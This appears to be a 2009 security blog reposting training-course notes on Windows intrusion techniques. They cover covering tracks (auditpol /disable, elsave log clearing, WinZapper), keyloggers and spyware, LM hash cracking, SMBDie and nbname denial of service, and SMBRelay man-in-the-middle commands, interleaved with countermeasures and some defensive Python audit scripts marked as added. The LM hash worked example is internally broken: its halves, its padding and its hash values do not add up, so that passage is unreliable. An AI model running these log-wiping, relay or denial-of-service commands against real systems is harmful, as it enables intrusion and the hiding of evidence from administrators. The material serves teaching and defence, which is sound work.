

Thursday, April 23, 2009

Covering Tracks

  • Once intruders have successfully gained Administrator access on a system, they will try to avoid detection of their presence.

  • When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

Erasing evidence of a compromise is a requirement for any attacker who wants to remain undetected. This usually starts with erasing the login records and any error messages that may have been generated by the attack; for example, a buffer overflow attack will usually leave a message in the system logs. Next, attention turns to making changes so that future logins are not logged. A good way of ensuring that the system administrator continues to believe the output of his system is to manipulate the event logs and tweak the audit system.

Because the first thing a system administrator does when monitoring for unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the system logs. In some extreme cases, rootkits can disable logging altogether and discard all existing logs. This happens if the intruders intend to use the system for a longer time as a launch base for future intrusion activity. Otherwise, they remove only those portions of the logs that could reveal their presence.

Disabling Auditing

  • The first thing intruders will do after gaining Administrator privileges is to disable auditing.

  • The NT Resource Kit's auditpol.exe tool can disable auditing from the command line.

  • At the end of their stay, the intruders will simply turn auditing on again using auditpol.exe.

One of the first steps for an attacker who has command-line capabilities is to determine the auditing status of the target system, locate sensitive files (such as password files), and implant automatic information-gathering tools (such as a keyboard logger or network sniffer).

Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.

auditpol.exe is part of the NT Resource Kit and can be used as a simple command-line utility to find out the audit status of the target system and also to make changes to it.

The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

C:\> auditpol \\ 

This will reveal the current audit status of the system. He can choose to disable the auditing by:

C:\> auditpol \\ /disable

This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

There is no effective technique to lock auditing so that auditpol cannot disable it. However, one can create a scheduled event that makes the system check the auditing status and turn it back on if it has been disabled. Most host-based IDS products will automatically re-enable auditing if it has been turned off.

There are a number of reasons why auditing is important. These include:

  • Successful attacks are often preceded by a series of unsuccessful ones.

  • Detecting an attack in its early phase can contain damage.

  • Recovery often depends on realistic damage assessment.

  • Auditing and intrusion detection helps determine causal factors/people for the attack.

  • Assessing network compromise is dependent on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

Clearing the Event Log

  • Intruders can easily wipe out the logs in the Event Viewer.

  • The Event Viewer on the attacker's host can open, read and clear the logs of the remote host.

  • This process will clear all records from the logs but will leave one record stating that the event log has been cleared by 'Attacker'.

The event-logging service controls whether events are tracked on Windows 2000 systems. When this service is started, user actions and system resource usage events can be tracked in the following event logs:

  • Application Log: records events logged by applications.

  • Directory Service: records events logged by Active Directory and its related services.

  • DNS Server: records DNS queries, responses, and other DNS activities.

  • File Replication Service: records file replication activities on the system.

  • Security Log: records events set for auditing with local or global group policies.

  • System Log: records events logged by the operating system or its components, such as the failure of a service to start at bootup.

In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared."

Dump Event Log (dumpel.exe) is a command-line tool included in the Windows 2000 Server Resource Kit. It dumps an event log for a local or remote system into a tab-separated text file, which can then be imported into a spreadsheet or database for further investigation. The tool can also be used to filter for or filter out certain event types.

The following syntax is used by the dumpel.exe tool:

dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x]

Where:

-f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

-s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

-l log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

-m source. Specifies the source (such as redirector (rdr), serial, and so on) whose records to dump. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

-e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

-r. Specifies whether to filter for specific sources or records, or to filter them out.

-t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

-d x. Dumps events for the past x days.
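To turn the three Security-log event IDs named above (529, 680, 517) into a repeatable check over a dumpel dump, here is an added Python example that is not part of the original post. It assumes a dumpel -t style tab-separated layout with the event ID in the fifth column and the user in the seventh; the sample lines are constructed.

```python
# Added example (not from the original post): scan a dumpel -t style
# tab-separated event-log dump for the Security-log event IDs named in
# the text. Column order (date, time, type, category, event ID, source,
# user, computer, description) is assumed; the sample lines are constructed.
from collections import Counter
from typing import Dict, List

# Event IDs from the text, with the meanings the text gives them.
WATCHED_EVENTS = {
    529: "Unknown user or bad password",
    680: "Account logon",
    517: "Security Log Cleared",
}

EVENT_ID_COL, USER_COL = 4, 6  # assumed dumpel -t column positions

# Constructed sample dump: three bad-password attempts on 'administrator',
# then a successful logon, then the Security log being cleared.
SAMPLE_DUMP = "\n".join([
    "4/23/2009\t08:01:10\t8\t2\t680\tSecurity\tjsmith\tWS01\tlogon ok",
    "4/23/2009\t08:02:15\t16\t2\t529\tSecurity\tadministrator\tWS01\tbad password",
    "4/23/2009\t08:02:17\t16\t2\t529\tSecurity\tadministrator\tWS01\tbad password",
    "4/23/2009\t08:02:19\t16\t2\t529\tSecurity\tadministrator\tWS01\tbad password",
    "4/23/2009\t08:03:00\t8\t2\t680\tSecurity\tadministrator\tWS01\tlogon ok",
    "4/23/2009\t08:30:44\t8\t1\t517\tSecurity\tadministrator\tWS01\tlog cleared",
    "4/23/2009\t09:00:00\t4\t0\t6005\tEventLog\tN/A\tWS01\tservice started",
])


def parse_dump(text: str) -> List[Dict[str, object]]:
    """Split each line on tabs; skip short or malformed lines."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) <= USER_COL or not fields[EVENT_ID_COL].isdigit():
            continue
        events.append({"id": int(fields[EVENT_ID_COL]),
                       "user": fields[USER_COL], "raw": line})
    return events


def watched_counts(events: List[Dict[str, object]]) -> Counter:
    """How many of each watched event ID appear in the dump."""
    return Counter(e["id"] for e in events if e["id"] in WATCHED_EVENTS)


def failures_per_user(events: List[Dict[str, object]]) -> Counter:
    """Number of 529 (bad password) events per account name."""
    return Counter(e["user"] for e in events if e["id"] == 529)


def suspicious_sequences(events: List[Dict[str, object]], threshold: int = 3) -> List[str]:
    """Flag an account whose run of >= threshold failed logons (529) is followed
    by a successful logon (680), and flag any Security-log-cleared (517) event.
    Events are assumed to be in chronological order, as dumpel writes them."""
    findings: List[str] = []
    fails: Counter = Counter()
    for e in events:
        user, eid = e["user"], e["id"]
        if eid == 529:
            fails[user] += 1
        elif eid == 680:
            if fails[user] >= threshold:
                findings.append(f"{user}: {fails[user]} failed logons then success")
            fails[user] = 0
        elif eid == 517:
            findings.append(f"{user}: security log cleared ({WATCHED_EVENTS[517]})")
    return findings


if __name__ == "__main__":
    evs = parse_dump(SAMPLE_DUMP)
    print(dict(watched_counts(evs)))
    for f in suspicious_sequences(evs):
        print("ALERT", f)
```

A 517 event that is not followed by a full set of the surrounding records is itself the finding: the cleared-log record survives the clearing, as the text on the Event Viewer notes.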


An attacker would be interested in clearing the event log after auditing has been disabled using auditpol.exe. One tool of interest is elsave.exe. Written by Jesper Lauritsen, this tool clears the NT event log.

ELSave takes the following arguments:

-s \\server

Server for which you want to save or clear the log.

-F file

Save the log to a file with this name. Must be an absolute path to a local file on the server specified with -s. If -F is not specified the log is not saved.

-l log

Name of log to save or clear. Must be one of system, application or security. Default is application.

-q

Write errors and warnings to the application event log. Default is to write errors to stderr. This option is mostly useful when ELSave is run in the background, like for example from the scheduler.

-C

Clears the log. If -C is not specified the log is not cleared.

Example:

Save the application log on \\serv1 to \\serv1\d$\application.log:

elsave -s \\serv1 -F d:\application.log

Save the system log on the local machine to d:\system.log and then clear the log:

elsave -l system -F d:\system.log -C

Hacking Tool: WinZapper

  • WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

  • To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then presses 'delete events' and 'exit'. Presto, the events disappear.

  • To sum things up: after an attacker has gained Administrator access to the system, one simply cannot trust the security log!

It is generally assumed that event logs cannot be tampered with unless the logging service is shut down, by legitimate means or otherwise. WinZapper is a tool that is capable of breaking into the event-logging system without shutting it off or crashing the service.

Evidence Eliminator

  • Evidence Eliminator is an easy-to-use, powerful and flexible data-cleansing system for Windows PCs.

  • Daily use protects you from unwanted data becoming permanently hidden in your PC.

  • It cleans recycle bins, Internet cache, system files, temp folders etc.

Evidence Eliminator is a Windows-based product known for countering privacy invasion and giving the user the ability to remove evidence of his activities on a system, such as websites visited, cookies stored, documents read etc.

Hiding Files

  • There are two ways of hiding files in NT/2000.

    1. Attrib

      • Use attrib +h [file/directory]

    2. NTFS Alternate Data Streams

      • The NTFS file system used by Windows NT, 2000 and XP has a feature called Alternate Data Streams, which allows data to be stored in hidden streams linked to a normal, visible file.

      • Streams are not limited in size, and there can be more than one stream linked to a normal file.

Every file consists of a set of attributes. However, a file's name is not part of the file. The filename is a directory entry that points to the actual file. This level of indirection is necessary because Windows 2000 and Windows NT both support links. The directory entry can be considered to be analogous to a pointer - the unique filename and directory entry tells the file system which file to access. It is possible to have more than one pointer that points to the same data.

---Regards,
Amarjit Singh

Keystroke Loggers: KEYLOGGERS

  • If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution.

  • Keystroke loggers are stealth software that sits between the keyboard hardware and the operating system, so that it can record every keystroke.

  • There are two types of keystroke loggers:

    1. Software based and

    2. Hardware based.

Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed on the keyboard and make it available to another person or agency probing the user. This record may be conveyed over e-mail or a web site, or even saved on the same system as a hidden file.

Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

Hardware keystroke loggers are hardware devices that attach physically to the keyboard and record data. These devices generally look like a standard keyboard adapter, so they remain camouflaged unless specifically looked for. In order to retrieve data from a hardware logger, the person doing the probing must regain physical access to that piece of equipment. Hardware loggers work by storing information in the device itself, and generally do not have the ability to broadcast or send such information out over a network. One primary advantage of hardware keystroke loggers is that they will not be discovered by any anti-spyware, anti-virus or desktop security programs.

Software keystroke loggers are more widely used as they can be installed remotely via the network, as part of virus / Trojan software etc. Physical access is not required on part of the person probing to obtain keystroke data (as data is emailed out from the machine periodically). Software loggers often have the ability to obtain much more data as well, as they are not limited by physical memory allocations in the same way as hardware keystroke loggers are. Magic Lantern - developed as part of the FBI's Carnivore project - is a Trojan/key-logger specifically aimed at gathering encryption key information for transmission back to the FBI.


Spyware: Spector (www.spector.com)

  • Spector is spyware that records everything anyone does on the Internet.

  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the computer's hard drive.


Hacking Tool: eBlaster (www.spector.com)

  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the Internet, even if you are thousands of miles away.

  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed, and then automatically sends this recorded information to your own email address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

IKS Software Keylogger

IKS (Invisible Keylogger) is a desktop activity logger powered by a kernel-mode driver. This driver enables it to run silently at the lowest level of the Windows 2000/XP operating systems. IKS is extremely difficult to detect, primarily because of its stealth surveillance methods. The only evidence of IKS is the growing binary keystroke log file as keystrokes are recorded. All keystrokes are recorded, including the Alt-Ctrl-Del sequence and keystrokes in a DOS box or Java chat room.

In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable. For manual setup, an attacker needs to copy just one program file to the target computer and add two lines to the system.ini file. He can then rename the log file, or even rename the program itself. Therefore, even an exhaustive hard drive search will not reveal that the program exists.

IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

Hacking Tool: Hardware Key Logger (www.keyghost.com)
  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

Recorded keystrokes can be played back into any text editor using a proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders, KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.

What is LanManager Hash?


Example: Let's say your password is '123456qwerty'.

  • When this password is encrypted with the LM algorithm, it is first converted to all uppercase: '123456QWERTY'

  • The password is padded with null (blank) characters to make it 14 characters long: '123456QWERTY_'

  • Before encrypting this password, the 14-character string is split in half: '123456Q' and 'WERTY_'

  • Each string is individually encrypted and the results concatenated.

  • '123456Q' = 6BF11E04AFAB197F

    'WERTY_' = F1E9FFDCC75575B15

  • The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

The first half of the hash contains alphanumeric characters and will take 24 hrs to crack with L0phtCrack, while the second half takes only 60 seconds.

All Windows clients including Windows 2000, Windows Server 2003, and Windows XP are configured by default to send LM and NTLM authentication responses, except Win9x clients, which only send LM. The default setting on servers allows all clients to authenticate with servers and use their resources. However, this default setting allows LM responses (the weakest form of authentication response) to be sent over the network. This makes it attractive to attackers, who can sniff the traffic and crack passwords with relatively little effort.

Microsoft Windows NT stores two types of passwords: a LAN Manager (LM) password and a Windows NT password. We saw in our discussion in module four how the domain controller issues an eight-byte challenge and how the client (server or workstation) replies with a twenty-four-byte challenge response. These hashes are transmitted without encryption over the network. If the domain controller authenticates the challenge response, it replies with an NT session key and a LAN Manager (LM) session key. These session keys are encrypted between the client and the domain controller.

Let us now take a look at the LAN Manager hash. LAN Manager uses a fourteen-byte password. If the password is shorter than fourteen bytes, it is padded with zeros. After conversion to upper case, it is split into seven-byte halves. From each seven-byte half an eight-byte odd-parity DES key is constructed. Each eight-byte DES key is then applied to a constant "magic number". The results of the two magic-number encryptions are concatenated into a sixteen-byte one-way hash value. This value is the LAN Manager one-way hash of the password.

It is easy for password crackers to detect whether the password has an eighth character when the LM hash is used. The challenge response can then be brute-forced for the LM hash. The number of possible combinations in an LM password is relatively low compared to the Windows NT password.
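The hashing steps described above (upper-case, null-pad to 14, split into seven-byte halves, build odd-parity DES keys) together with the "eighth character" check, as an added Python example that is not from the original post. The DES encryption of the magic number itself is left out because the standard library has no DES; the constant AAD3B435B51404EE is the well-known LM hash of a half that is entirely padding, and the audit input at the end is constructed.

```python
# Added example (not from the original post): the LM hash preprocessing
# steps described above, plus the "empty second half" check that reveals a
# password of seven characters or fewer. The DES step itself is omitted
# (the standard library has no DES); EMPTY_HALF_HASH is the well-known
# LM hash of a half-block that is entirely padding.
from typing import Dict, List, Tuple

EMPTY_HALF_HASH = "AAD3B435B51404EE"


def lm_preprocess(password: str) -> Tuple[bytes, bytes]:
    """Upper-case, null-pad to 14 bytes and split into two 7-byte halves."""
    if len(password) > 14:
        raise ValueError("LM covers at most 14 characters")
    padded = password.upper().encode("ascii").ljust(14, b"\x00")
    return padded[:7], padded[7:]


def des_key_from_half(half: bytes) -> bytes:
    """Expand a 7-byte half into the 8-byte odd-parity DES key LM uses.

    The 56 bits are read MSB-first in seven-bit groups; each group becomes
    the top seven bits of a key byte, and the low bit is set when needed so
    that every key byte has an odd number of 1 bits."""
    if len(half) != 7:
        raise ValueError("half must be exactly 7 bytes")
    bits = int.from_bytes(half, "big")
    key = bytearray()
    for i in range(8):
        group = (bits >> (49 - 7 * i)) & 0x7F   # i-th 7-bit group
        byte = group << 1
        if bin(byte).count("1") % 2 == 0:       # force odd parity
            byte |= 1
        key.append(byte)
    return bytes(key)


def lm_hash_is_short_password(lm_hash_hex: str) -> bool:
    """True when the second half of a 32-hex-digit LM hash is the empty-half
    constant, i.e. the password had no eighth character."""
    h = lm_hash_hex.strip().upper()
    if len(h) != 32 or any(c not in "0123456789ABCDEF" for c in h):
        raise ValueError("LM hash must be 32 hex digits")
    return h[16:] == EMPTY_HALF_HASH


def audit_lm_hashes(entries: Dict[str, str]) -> List[str]:
    """Given {account: lm_hash}, list accounts whose password is at most
    seven characters (the half that cracks in seconds rather than hours)."""
    return [acct for acct, h in entries.items() if lm_hash_is_short_password(h)]


if __name__ == "__main__":
    first, second = lm_preprocess("123456qwerty")
    print(first, second, des_key_from_half(first).hex())
    # constructed sample: 'short' has an all-padding second half
    print(audit_lm_hashes({"short": "6BF11E04AFAB197F" + EMPTY_HALF_HASH,
                           "long": "6BF11E04AFAB197FF1E9FFDCC75575B1"}))
```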

While authentication protocols such as Kerberos are considered an effective countermeasure, the Windows 9x and Windows NT operating systems cannot use the Kerberos version 5 protocol for authentication. Therefore, on Windows Server 2003 as well, these systems authenticate by default with both the LM and NTLM protocols for network authentication. What is possible, though, is for Windows 9x and Windows NT to use a more secure authentication protocol such as NTLMv2. For the logon process, NTLMv2 uses a secure channel to protect the authentication process. For this, these systems must set the LAN Manager Authentication Level to "Send NTLMv2 responses only".


Wednesday, April 22, 2009

Nokia 1100 handsets may be vulnerable to hacking

Incidents of Nokia 1100 handsets being in demand at prices as high as $33,000 in some cases, and the subsequent investigations by agencies, have revealed that the model retains login details of transactions carried out through it and can therefore be misused by hackers.

This was revealed by Netherlands-based Ultrascan Advanced Global Investigations, which was roped in by the police to investigate why people were ready to pay so much for an old handset model.

Only handsets manufactured at Nokia's Bochum, Germany plant are reported to be prone to such hacking, not the entire range.

Source: http://www.telecomtiger.com


Computers Worldwide Hit By Cyber Hackers

A small group of cyber criminals have succeeded in hacking into almost two million computers around the world - including British Government machines.

The global network of 1.9m computers, infected with malicious software, or malware, was tracked to a cyber gang of six people based in the Ukraine.
The malware was remotely controlled by the gang, allowing them to read emails, copy files, record keystrokes, send spam and make screenshots, security firm Finjan said.


The criminal network of remotely controlled computers, known as a botnet, was the largest ever discovered, Finjan said - its server has now been shut down.
The botnet started operating in February, infecting consumer, corporate, and government machines.

By far the highest number of infected machines was found in the US, with 45% of the total while the UK's 115,000 affected machines accounted for 6% of the total.



The malware infects computers running the Windows XP operating system using vulnerabilities in web browsers such as Internet Explorer and Firefox.
It installs itself on computers when a legitimate but compromised website is visited; computer users do not have to click on a specific link or download any programmes for the malware to take effect.

"As predicted at the end of last year, cyber criminals keep on looking for improved methods to distribute their malware and Trojans are winning the race," said Yuval Ben-Itzhak, Finjan's chief technology officer.

"The sophistication of the malware and the staggering amount of infected computers proves that cyber gangs are raising the bar."

The gang members, who have not been caught, were selling access to the compromised machines on a hackers' forum in Russia, auctioning access to 1,000 computers at a time for around £75 a day.

Mr Ben-Itzhak said key loggers could also be used to obtain credit card details for the gang's own use or to be sold on.

A spokesman for the Cabinet Office, which sets standards for the use of information technology across Government, said he could not give details of the departments involved while police said they were aware of the botnet and taking "appropriate action".

Source: http://news.sky.com


Hacking Tool: John the Ripper

  • It is a command-line tool designed to crack both Unix and NT passwords. John is extremely fast and free.

  • The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.


SMB Hacking Tools

Hacking Tool: SMB Grind

SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

Password cracking of sniffer dumps is a time-consuming, laborious process unless it is targeted towards particular accounts. Removing duplicate entries and targeting specific users without manually editing the dump files is therefore one way of speeding up L0phtCrack sessions.

If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.

SMBGrind is a tool that seeks to solve this problem and make password cracking by LOphtCrack faster. It removes duplicates and saves the file to disk so that the attacker can e-mail the filtered file directly from within SMB Grinder via the File-Send menu option.

Hacking Tool: SMBDie

The SMBDie tool crashes computers running Windows 2000/XP/NT by sending a specially crafted SMB request.

SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.

An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

Any machine on the network, including systems connected via VPN, can launch this attack. All an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LanmanServer service can be stopped, which prevents the attack, but again this may not be suitable on a file and print server.

Hacking Tool: NBTDeputy

  • NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.

  • NBTDeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.

  • This tool works well with SMBRelay.

  • For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET server when logged-on users access "My Network Places".

There are certain prerequisites for NBTDeputy to be effective. NetBIOS over TCP/IP must be disabled, as NBTDeputy uses ports 137 and 138. The user must specify a unique computer name on the LAN because NBTDeputy does not check for existing computer names. The user must also specify an existing workgroup on the LAN, as NBTDeputy does not become the Master Browser. NBTDeputy must be on the same LAN as the targeted XP and .NET Server machines.

NetBIOS DoS Attack
  • Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict, so that the system will no longer be able to use it.

  • This will block the client from participating in the NetBIOS network.

  • Tool: nbname

    • NBName can disable entire LANs and prevent machines from rejoining them.

    • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.

For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.

NBName is a tool written by Sir Dystic of the Cult of the Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.

Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.


Tuesday, April 21, 2009

SMBRelay Weakness & Countermeasures

  • The problem is to convince a victim's client to authenticate to the MITM server.

  • You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

  • Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.

Countermeasures

  • Configure Windows 2000 to use SMB signing.

  • Client and server communication will cause it to cryptographically sign each block of SMB communications.

  • These settings are found under Security Policies / Security Options.

There are inherent weaknesses in executing an SMBRelay attack. The hindrances to this attack point towards the countermeasures to be adopted. Firstly, SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges, as this is a port number less than 1024.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from a system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.

Another countermeasure, as discussed earlier in the context of the SMBRelay MITM, is to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection.

While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.

NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

---Regards,
Amarjit Singh

SMBRelay man-in-the-middle Scenario

  • The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T.

    c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

  • When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, hashes the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.

Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:

c:\>smbrelay /IL 2 /IR 2 /L+ 192.168.200.114 /R 192.168.200.252 /T 192.168.200.168

A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

---Regards,
Amarjit Singh

SMB Hacking Tools - SMB Relay

Hacking Tool: SMB Relay
  • SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic.

  • It can also perform man-in-the-middle (MITM) attacks.

  • You must disable NetBIOS over TCP/IP and block ports 139 and 445.

  • Start the SMBRelay server and listen for SMB packets:

    c:\>smbrelay /e
    c:\>smbrelay /IL 2 /IR 2

  • An attacker can access the client machine by simply connecting to it via the relay address using: c:\>net use * \\192.x.x.x\c$

